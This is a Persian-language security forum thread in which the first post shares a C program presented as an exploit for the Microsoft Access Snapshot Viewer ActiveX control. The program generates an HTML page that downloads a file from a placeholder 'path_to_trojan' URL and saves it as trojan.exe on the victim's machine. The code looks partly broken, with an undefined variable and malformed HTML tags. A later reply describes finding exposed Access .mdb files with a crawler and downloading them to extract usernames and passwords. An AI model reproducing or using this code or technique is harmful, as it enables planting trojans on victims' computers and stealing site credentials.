نمایش نتایج: از شماره 1 تا 6 از مجموع 6
سپاس ها 1سپاس

موضوع: باگ خطرناک در ACCESS

  
  1. #1
    نام حقيقي: Alireza HBB

    عضو غیر فعال شناسه تصویری Alux
    تاریخ عضویت
    Jan 2006
    محل سکونت
    Tehran
    نوشته
    1,492
    سپاسگزاری شده
    286
    سپاسگزاری کرده
    399

    باگ خطرناک در ACCESS

    یه باگ خطرناک امروز دیدم واسه اکسل اومده

    که با کابر اجازه می ده یه تروجان در سرور آپلود کنه

    باگ بصورت ریموت هست

    اینم کد



    کد:
    /* Microsoft Access Snapshot Viewer ActiveX Control Exploit Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0 Download nice binaries into an arbitrary box Vulnerability discovered by Oliver Lavery http://www.securityfocus.com/bid/8536/info Remote: Yes greetz to str0ke */ #include <stdio.h> #include <stdlib.h> #define Filename "Ms-Access-SnapShot.html" FILE *File; char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n" "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n" "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n" "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n" "<script>\n<html>"; int main () { printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n"); printf("**c0ded by callAX**\n"); printf("**r00t your enemy .| **"); char *b0fer; if ( (File = fopen(Filename,"w")) == NULL ) { printf("\n fopen() error"); exit(1); } b0fer = (char*)malloc(strlen(data)); fwrite(data, strlen(data), 1,File); fclose(File); printf("\n\n" Filename " has been created.\n"); return 0; }




    موضوعات مشابه:
    ccna سپاسگزاری کرده است.

  2. #2
    نام حقيقي: شاهین غرقی

    خواننده شناسه تصویری webgard3
    تاریخ عضویت
    Feb 2006
    محل سکونت
    iran/shiraz
    نوشته
    3,401
    سپاسگزاری شده
    1040
    سپاسگزاری کرده
    147
    یعنی آپلود کنه روی سروری که روش اکسل نصبه؟



  3. #3
    نام حقيقي: Alireza HBB

    عضو غیر فعال شناسه تصویری Alux
    تاریخ عضویت
    Jan 2006
    محل سکونت
    Tehran
    نوشته
    1,492
    سپاسگزاری شده
    286
    سپاسگزاری کرده
    399
    آره ، خوراک NTTAC



  4. #4
    نام حقيقي: مهدي

    عضو عادی شناسه تصویری herus_deus
    تاریخ عضویت
    May 2004
    نوشته
    986
    سپاسگزاری شده
    328
    سپاسگزاری کرده
    164
    البته اكسس منظوره نظر بوده.



  5. #5
    نام حقيقي: Alireza HBB

    عضو غیر فعال شناسه تصویری Alux
    تاریخ عضویت
    Jan 2006
    محل سکونت
    Tehran
    نوشته
    1,492
    سپاسگزاری شده
    286
    سپاسگزاری کرده
    399
    اشتباه لپی بود !!!



  6. #6
    نام حقيقي: ali

    در اتتظار تایید
    تاریخ عضویت
    Nov 2007
    نوشته
    162
    سپاسگزاری شده
    38
    سپاسگزاری کرده
    36
    access باگ زیاد داده ... الان شما اگه یک سروری که دیتابسش از اکسس باشه کار براش از اکسس استفاده کنن ( که نیست دیگه خیلی قدیمیه ) شما با یه برنامه ای مثل Intellitamper می تونین فایل MDB رو پیدا کنین و دل کنین که یوزر پس توش هستش .. مثلا پورتال های News دوسال پیش یادامه خیلی اینجوری هک می شدن ..... اینم باگ جالبی بود ممنونم از دوسته خوبمون آقا علی رضا بابت اطلاع رسانیه عالی



کلمات کلیدی در جستجوها:

باگ های n

برچسب برای این موضوع

مجوز های ارسال و ویرایش

  • شما نمی توانید موضوع جدید ارسال کنید
  • شما نمی توانید به پست ها پاسخ دهید
  • شما نمی توانید فایل پیوست ضمیمه کنید
  • شما نمی توانید پست های خود را ویرایش کنید
  •